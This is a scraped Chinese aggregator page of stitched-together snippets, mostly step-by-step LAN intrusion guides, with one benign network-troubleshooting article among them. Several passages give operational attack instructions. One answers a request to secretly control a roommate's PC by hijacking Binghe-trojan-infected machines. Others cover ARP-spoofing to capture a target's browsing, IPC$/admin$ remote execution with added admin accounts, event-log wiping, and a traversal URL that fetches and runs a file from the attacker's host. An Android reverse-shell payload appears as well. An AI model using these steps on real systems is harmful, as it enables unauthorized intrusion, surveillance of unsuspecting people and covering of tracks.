精华内容
下载资源
问答
  • 局域网入侵

    2014-05-22 12:14:27
    通过软件 轻松进入局域网内的电脑~!还在想你的室友在干什么吗~ 去看看把~!
  • 想用灰鸽子或其他方法控制(或以其他的方式入侵)那台电脑。我和对方的操作系统是XP。已经有的工具是流光,灰鸽子,嗅探器和一些端口扫描工具。经扫描,对方21端口开放。其他未知。希望高手提供针对性的步骤,最好有...

    6ddf5242ab65c4a6657ab9d8127f99db.gif

        我和另一台电脑同在一个局域网下,对方IP已知,用户名和密码未知。 想用灰鸽子或其他方法控制(或以其他的方式入侵)那台电脑。 我和对方的操作系统是XP。已经有的工具是流光,灰鸽子,嗅探器和一些端口扫描工具。经扫描,对方21端口开放。其他未知。 希望高手提供针对性的步骤,最好有一些解释。不希望看到复制其他网页上的泛泛的解释。 如成功,追加我能给的所有奖分。问题补充: 对方PING不通,不知道为什麽。同样,用好多IPSCANER都扫不到他。 路由器是D-LINK的DI-64型号。我可以修改路由器设置。不能直接接触对方电脑,否则要远程控制干吗。方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。 方法二: 第一步 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我进行第二步! 第二步 运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。 第三步 在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。 第四步 进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。 好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。 第五步 观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。 下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。 第六步 点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。 第七步 在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。 好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。第八步 这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、D:。 第九步 点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!! 第十步 你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址: 1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃! 2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!! 第十一步 如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。 第十二步 如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功! 第十三步 终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!。

    4c04c446c2ddecadec5ca3ea1b895432.png

    95126a2a7c0ce938163b61f82ccfa94a.png

    baab487f5d1cf04ba89fe047977483f5.gif
    展开全文
  • 今天安仔为大家推荐的工具是linux下运行的入侵工具EtterCap。再次声明,本教程仅供学习交流使用,不得用于非法途径,请大家守住自己的底线,做个有道德的网民。我们在对WEB安全检测的时候都会用到Cain和netfuke这两款...

    今天安仔为大家推荐的工具是linux下运行的入侵工具EtterCap。再次声明,本教程仅供学习交流使用,不得用于非法途径,请大家守住自己的底线,做个有道德的网民。

    我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。

    而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。

    e20959442615a04c6de168bc692fb608.png

    简单来说,EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。

    借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。

    今天演示一下EtterCap简单入侵获取目标浏览图片!首先打开kali选择应用中心下拉选项中的嗅探/欺骗选项里的EtterCap,或者在终端里输入ettercap -G

    740eec4c6fa5567857702a71a900928a.png

    点击打开后右上选择Sniff选项里的Unified sniffing(嗅探模式)或者Ctrl+U设置好要嗅探的网卡(一般都是eth0),开始嗅探。

    3685a1b65f6a98f397851f3db65358ca.png

    嗅探局域网内的所有存活主机,选择Hosts下拉选项里的Hosts list选项。

    8da3354ad8adc5c24dfbb104d55899ca.png
    c1f461763ce445586c7a28811b796d64.png

    开启中间人监听模式,将要监听的两端分别添加到Target1、Target2,然后选择mitm下拉选项里的arp posoning选项 ,勾选sniff remote connections(嗅探并保持原连接状态)点击确定。

    28830fa028ae484e257485bf29b43b76.png
    b5a9ac23ab8a6064eeec7e7a6a84a2e7.png
    7dcb55d9b04f7fd76490263cb1c341ed.png

    查看被监听主机之间的所有连接信息,选择View下拉选项里的Connections选项。

    2d2feefbcca39f17ca019d9efa263ba9.png

    打开一个终端,输入:ettercap -i eth0 -Tq -M arp:remote //目标ip// //自己ip//,开启中间人监听;再打开一个终端,输入:driftnet -i eth0 ,就可以截获目标正在浏览的图片了。

    c1800c83ee7ad689c361d05b771e05a8.png
    2957b5c695548d4f34145a5757dd60f3.png
    845e0a073bfe72371dd1270cee685eec.png

    目标主机和攻击者必须在同一个局域网内。在截取图片时,目标主机需得在攻击者窃听后开启浏览器浏览带图片的网页,然后才会获取到图片。

    再次声明:本教程仅供学习使用,不得用于非法途径。

    小白入行网络安全、混迹安全行业找大咖,以及更多成长干货资料,欢迎关注@安界人才培养计划

    如果你想学习渗透测试(注:渗透测试指模拟恶意黑客攻击进行安全测试)相关知识,可以先私信回复【领券】,即可领取小白学渗透专属499减400的小白学渗透专用券,先领券,后学习,更实惠!

    如果你想加入“黑客”安全交流群,欢迎大家私信回复 “入群” ,加入安界网安全大咖学习交流群,一起学习,一起进步哦!

    我是安仔,一名刚入职网络安全圈的网安萌新,欢迎关注我,跟我一起成长。

    展开全文
  • 无线局域网入侵检测

    2018-05-18 16:37:37
    无线局域网(W LAN) 因其无线信道的特殊性, 较传统有线网更易受到攻击。入侵检测是较主动的安 全监控技术, 能防止外部的入侵还能检测内部的非法使用。研究将入侵检测应用于WLAN, 将会提高WLAN 的 主动防御能力。据...
  • 局域网入侵教程网站安全电脑资料 首先申明 1.入侵的范围只包括局域网如果在学校上可以入侵整个校园网 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)并且开了139端口但没开防火墙的机子 2.使用"Recton...
  • 一款集局域网入侵查看嗅探为一身的强大软件,破解版的。
  • 一个简单的局域网入侵方法,该方法可以免杀卡巴这个杀毒软件
  • 局域网入侵工具 扫描

    2009-10-16 13:52:53
    自己看吧 很简单 [window position] top=47 left=127 width=821 height=533 [panel position] left_panel=249 bottom_panel=118 [Dock] RightDockPanel=alRight [NBT_IP] IP1= IP2= ...save_nbt=no
  • 现如今,人们的生活处处离不开网络。企业办公信息化对网络的依赖则更大。为了提升安全管理和信息化水平,很多企业不仅建设了完善的办公信息...一、网络克隆速度太慢“网克(网络克隆)”就是局域网内使用一台服务器通...

    ea5a2814b6b75cd9629adc0afd624af4.png

    现如今,人们的生活处处离不开网络。企业办公信息化对网络的依赖则更大。为了提升安全管理和信息化水平,很多企业不仅建设了完善的办公信息系统,还部署了视频监控。但由于缺乏整体规划,或选择网络产品时考虑欠周,导致网络建设没有达到预期效果,后续出现很多应用问题。

    5a01394c6060746c2a2c5427783edb9c.png

     下面几个网络应用中的常见问题,各位弱电工程师或网管人员是否深有体会?

    一、网络克隆速度太慢

    “网克(网络克隆)”就是局域网内使用一台服务器通过组播或广播方式向多个客户端同时传送数据,相当于批量操作,达到客户端系统自动安装、更新或还原的目的。

    有时候,网吧或校园网里安装的无盘系统或系统还原卡在交换机上使用“网克”功能时,可能会出现速度很慢的现象。通过修改交换机的风暴控制、流量控制等功能,比如所有端口关闭流控,就能使“网克”工作正常起来。

    但一般情况下,修改交换机配置,需要在管理界面进行参数设置,需要编写代码,设置过程比较复杂。由于每一种交换机的设置程序有所不同,对网管人员来说,无疑增加了工作量和难度。

    ae45b920c1d238cac410ca7612b807d4.png

    二、交换机环路导致网络瘫痪

    在学校、小区居民楼、中小企业以及酒店等网络环境中,随着网络规模的扩大,需要引入大量的交换设备。搭建网络时若对网络结构不熟悉,则很容易在网络中引入环路。比如说,环路的出现极易引发一个广播包在网络中不断循环转发,由此产生的广播风暴将极大地消耗网络资源,导致正常数据包无法转发,网络质量严重下降甚至瘫痪。

    网络环路的原因:对网络没有合理规划,使多个端口接多台设备成环,某个端口下面线路打环。环路最容易出现的就是新加入设备,或网络扩充。(比如你公司新增加了一个部门组建网络时)。

    网络环路的表现:交换机就会受到大量的数据信息冲击,造成网络传输通道严重堵塞,数据信息无法及时传递,最直接的征兆就是影响同一个VLAN的用户上网,网络出现时通时断的现象;

    5bf18b481503fdb0af95cc3688e9ab59.png

    网络中由于错误布线容易导致出现环路,UTP3-GSW16/24无需任何配置即可及时有效地检测网络中是否存在环路,自动阻塞端口,提高网络可靠性。

    三、局域网小路由导致ip地址冲突

    很多企业用户经常会遇到这样的情况,网络明明好好的,突然就上不去或者网络变得缓慢。通过检查网络配置,发现交换机产品的性能、端口都没问题,而在输入路由器管理的IP地址后,却发现管理界面中显示的不是之前的路由器,而是其他部门或其他人员私接了路由器,导致IP地址冲突。

    b6e84d41e3d00a149bd992a30004f432.png

    这种情况在部门众多的企业、人员密集的宿舍或者酒店等环境中常有发生。以酒店为例,经常会有客户将自己携带的无线路由器LAN口接到酒店网络,导致IP地址冲突,网络崩溃。

    前天我们已经给出了ip地址冲突的解决办法,那么有没有更简单的解决方式呢?

    答案是:肯定有的,为了避免这种情况发生,需要给交换机配置DHCP snooping功能,并进行端口隔离设置,但系统设置同样需要专业网络知识,需要懂代码,且增加了一定的工作量。

    四、局域网遭受ARP病毒攻击

    ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写,主要用来实现IP地址和对应设备的物理地址之间的相互转换,从而达到通过IP地址来访问网络设备的目的。

    由于ARP协议本身存在一些设计上的缺陷,非法入侵者会通过撰改IP与MAC之间的对应关系,非法获取并替换他人的MAC,以达到非法监听和获取数据信息的目的,这种网络攻击方式称为ARP病毒入侵。

    e49ac21b06b5f912af8cdc25f153a201.png

    ARP攻击是很普遍的网络现象,很多朋友都会用交换机来防止ARP攻击。

    例如,

    通过配置端口最大MAC地址个数,限制和绑定MAC地址,防止用户进行恶意的ARP欺骗,但此设置过程也比较复杂。

    五、办公网被监控数据占用,导致网络缓慢

    随着视频监控系统的应用逐渐普及,其在企业信息化建设中被广泛采用。很多企业在规划信息系统之初,并没有将办公网络监控网络有效隔离,导致视频监控数据占用较大带宽,导致企业办公网速较慢,影响了企业正常业务的开展。

    一般,网管人员会通过VLAN进行端口隔离,或采用独立交换机的方式隔离出办公网络和监控网络。在预算有限的情况下,也有些通过设置不同的网段来达到网络隔离的目的。

    2a6334be014a10f06acc2b84a7afdac8.png 

    当然,不同用户在不同的应用场景下,面临的网络应用问题远不止这些。但如果能提前做好网络规划,或者做好设备选型与配置,则能大大减少网络故障。在防范网络安全,保证网络应用稳定性方面,交换机的选型和配置相当关键。

    9ac3ecdba9dd59e283262bb8a92ea38a.png

    结语:优质内容贵在与同行分享,共同学习,共同进步,共同成长。感谢微信公众平台及大家的支持!

    资料获取方式:在公众号主菜单栏左下角点击“资料获取”!

    652191d9a59c2809d8a7638da2b0aead.png

    展开全文
  • 一些简单的局域网入侵命令

    千次阅读 2012-07-09 09:21:27
    (与远程主机建立空管连接) net use \\IP地址\ipc$ " " /use:" " ... /use:" Administrator"...(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ ...
    (与远程主机建立空管连接) net use \\IP地址\ipc$ " " /use:" " 
    

    (以管理员身份登录远程主机) net use \\IP地址\ipc$ " 密码" /use:" Administrator"

    (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$

    (查看远程主机时间) net time \\IP地址

    (定时启动某个程序) at \\IP地址 02:18 readme.exe

    (查看共享) net view \\IP地址

    (查看netbios工作组列表) nbtstat -A IP地址

    (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ " " /user:" Administrator"

    (这两条把自己增加到管理员组): net user 用户名 密码 /add

    net localgroup Administrators 用户名 /add


    一、netsvc.exe

    下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“ 时间任务” 服务:

    netsvc /list \\IP地址

    netsvc schedule \\IP地址 /query

    netsvc \\IP地址 schedule /start


    二、OpenTelnet.exe

    远程启动主机的Telnet服务,并绑定端口到7878,例如:

    OpenTelnet \\IP地址 用户名 密码 1 7878

    然后就可以telnet到主机的7878端口,进入DOS方式下:

    telnet IP地址 7878


    三、winshell.exe

    一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD> 后,可打下面的命令:

    p Path (查看winshell主程序的路径信息)

    b reBoot (重新启动机器)

    d shutDown (关闭机器)

    s Shell (执行后你就会看到可爱的“ C:\> ” )

    x eXit (退出本次登录会话,此命令并不终止winshell的运行)

    CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)


    四、3389登陆器,GUI方式登录远程主机的


    五、elsave.exe

    事件日志清除工具

    elsave -s \\IP地址 -l " application" -C

    elsave -s \\IP地址 -l " system" -C

    elsave -s \\IP地址 -l " security" -C

    执行后成功清除应用程序日志,系统日志,安全日志


    六、hbulot.exe

    开启win2kserver和winxp的3389服务

    hbulot [/r]

    使用/r表示安装完成后自动重起目标使设置生效。


    七、nc.exe(netcat.exe)

    一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。

    想要连接到某处: nc [-options] hostname port[s] [ports] ...

    绑定端口等待连接: nc -l -p port [-options] [hostname] [port]

    参数:

    -e prog 程序重定向,一旦连接,就执行 [危险!!]

    -g gateway source-routing hop point[s], up to 8

    -G num source-routing pointer: 4, 8, 12, ...

    -h 帮助信息

    -i secs 延时的间隔

    -l 监听模式,用于入站连接

    -n 指定数字的IP地址,不能用hostname

    -o file 记录16进制的传输

    -p port 本地端口号

    -r 任意指定本地及远程端口

    -s addr 本地源地址

    -u UDP模式

    -v 详细输出— — 用两个-v可得到更详细的内容

    -w secs timeout的时间

    -z 将输入输出关掉— — 用于扫描时


    八、TFTPD32.EXE

    把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:

    http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名

    然后可以直接令文件运行:

    http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名


    九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“ 溢出后在一个端口监听” ,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。


    十、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

    十一、 Xscan命令行运行参数说明:

    在检测过程中,按" [空格]" 键可以查看各线程状态及扫描进度,按" q" 键保存当前数据后提前退出程序,按" " 强行关闭程序。

    1.命令格式: xscan -host [-] [其他选项]

    xscan -file [其他选项]

    其中 含义如下:

    -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的" PORT-SCAN-OPTIONS\PORT-LIST" 项定制待检测端口列表);

    -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

    -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);

    -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的" CGI-ENCODE\encode_type" 项设置编码方案);

    -iis : 检测IIS漏洞(可通过\dat\config.ini文件的" CGI-ENCODE\encode_type" 项设置编码方案);

    [其他选项] 含义如下:

    -v: 显示详细扫描进度

    -p: 跳过Ping不通的主机

    -o: 跳过没有检测到开放端口的主机

    -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10
    展开全文
  • 该文档是入侵局域网他人电脑案例,借鉴思路。
  • 入侵局域网电脑

    千次阅读 2020-11-17 19:19:03
    方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 ...
  • Kali入侵局域网手机

    千次阅读 多人点赞 2021-05-08 23:03:04
    浏览了Kali 入侵局域网手机的文章 自己也来试试 环境 电脑 手机 处于同一局域网 Kali设置桥接模式 手机处于同一WIFI下 (用桥接模式使得可配置其IP地址跟物理主机、手机在同一个网段之中,形成一个小局域网) 1. 准备...
  • 局域网入侵查看是一款不错的工具局域网入侵查看是一款不错的工具
  • 无线局域网的安全非常重要,我们通过对入侵攻击的特征提取实现检测
  • 入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),或已知道账号密码 并且开了139端口,但没开防火墙的机子。 入侵工具:一般要用到三个:...
  • 然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名..................
  • 局域网入侵扫描器 Bata V1.0.2.3.exe
  • kali入侵win7.txt

    2019-07-23 13:58:13
    整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
  • 一些内网的,命令行格式的工具,可以来看看,很简单
  • 利用Kali入侵局域网的手机

    万次阅读 多人点赞 2019-03-30 11:02:36
    生成木马病毒(将生成的apk文件拷贝到手机) msfvenom -p android/meterpreter/reverse_tcp LHOST=*.*.*.*(本地IP) LPORT=*(本地端口) -o *(输出目录) 启动postgresql数据库 service postgresql start ...
  • 无线局域网(WLAN)作为一种无线通信技术,使通信摆脱了时间、地点和对象的束缚, 极大地方便了人们的生活,加快了社会的发展。然Ifu在WLAN因其移动性、灵活性、可伸 缩性、经济性的特点飞速发展,为人们生活带来极大...
  • 如何构建局域网入侵检测系统是很多管理者头疼的事情,本人给出小小建议,大家交流交流
  • 如何入侵局域网电脑

    千次阅读 2016-01-07 15:00:00
    如何入侵局域网电脑 方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的...
  • 局域网入侵的方法

    2014-03-15 16:07:00
    局域网入侵最简单了。我教你方法,但教了你所惹出的事本人概不负责!  1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息...
  • kali局域网攻击(一)

    千次阅读 多人点赞 2021-03-24 19:58:51
    arp攻击 arp路由链表,感兴趣的自行百度,我的博客我的笔记. 路由指向 介绍两个东西. echo 0 >...echo 1 >... 内网扫描 这个在百度上你可以看到很多相关的方式,比如nmap fping 但是基本上扫描结果不太号,在虚拟机上你...
  • IPC$局域网入侵详解

    2019-09-21 17:34:00
    如何防范ipc$入侵 1、禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建 [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/LSA]把 ...
  • Dos命令入侵局域网电脑

    万次阅读 多人点赞 2015-08-26 17:52:20
    这里说明数据从外地机器传输到192.168.0.1 机器上,中间没有经过任何中转,说明这两台机器是同一段局域网内。用法: tracert IP 五, net 这个命令是网络命令中最重要的一个,必需透彻掌握它每一个子命令的...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 13,196
精华内容 5,278
关键字:

局域网入侵